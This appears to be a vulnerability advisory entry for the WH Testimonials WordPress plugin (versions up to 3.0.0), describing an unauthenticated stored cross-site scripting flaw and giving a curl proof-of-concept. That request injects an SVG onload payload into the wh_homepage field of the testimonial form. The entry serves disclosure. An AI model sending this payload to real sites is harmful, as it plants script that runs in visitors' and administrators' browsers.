WPEX-ID: 7F8E4A22-4349-483E-8071-07292AE96730 (wpexploit / wpvulndb)
History: Mar 11, 2023 - 12:00 a.m.

WH Testimonials <= 3.0.0 - Unauthenticated Stored XSS

2023-03-11 00:00:00
wpvulndb
83
Tags: unauthenticated stored xss, http post, boundary header

EPSS

0.001

Percentile

40.7%

The plugin does not sanitise and escape the wh_homepage, wh_text_short and wh_text_full parameters of submitted Testimonials, which could allow unauthenticated attackers to perform Stored Cross-Site Scripting attacks.

# Proof of concept from the advisory: an unauthenticated multipart POST to the
# testimonial submission form. wh_homepage, wh_text_short and wh_text_full are the
# fields stored without sanitisation or escaping; the payload here sits in wh_homepage.
# Every part must use the same boundary string declared in the Content-Type header.
curl -X POST 'http://example.com/add/' \
-H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLKXxMfAqKI63OgZ4' \
-H 'Host: example.com' \
-H 'Content-Length: XXX' \
-d $'------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_clientname"\r\n\r\nFirst Name\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_company"\r\n\r\nLast Name\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_homepage"\r\n\r\n\"><svg/onload=prompt(/XSS/)>\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_text_short"\r\n\r\nShort Review\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_text_full"\r\n\r\nLong Review\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_sfimgurl"; filename=""\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="Wh_addnew"\r\n\r\nAdd Testimonial\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4--\r\n'

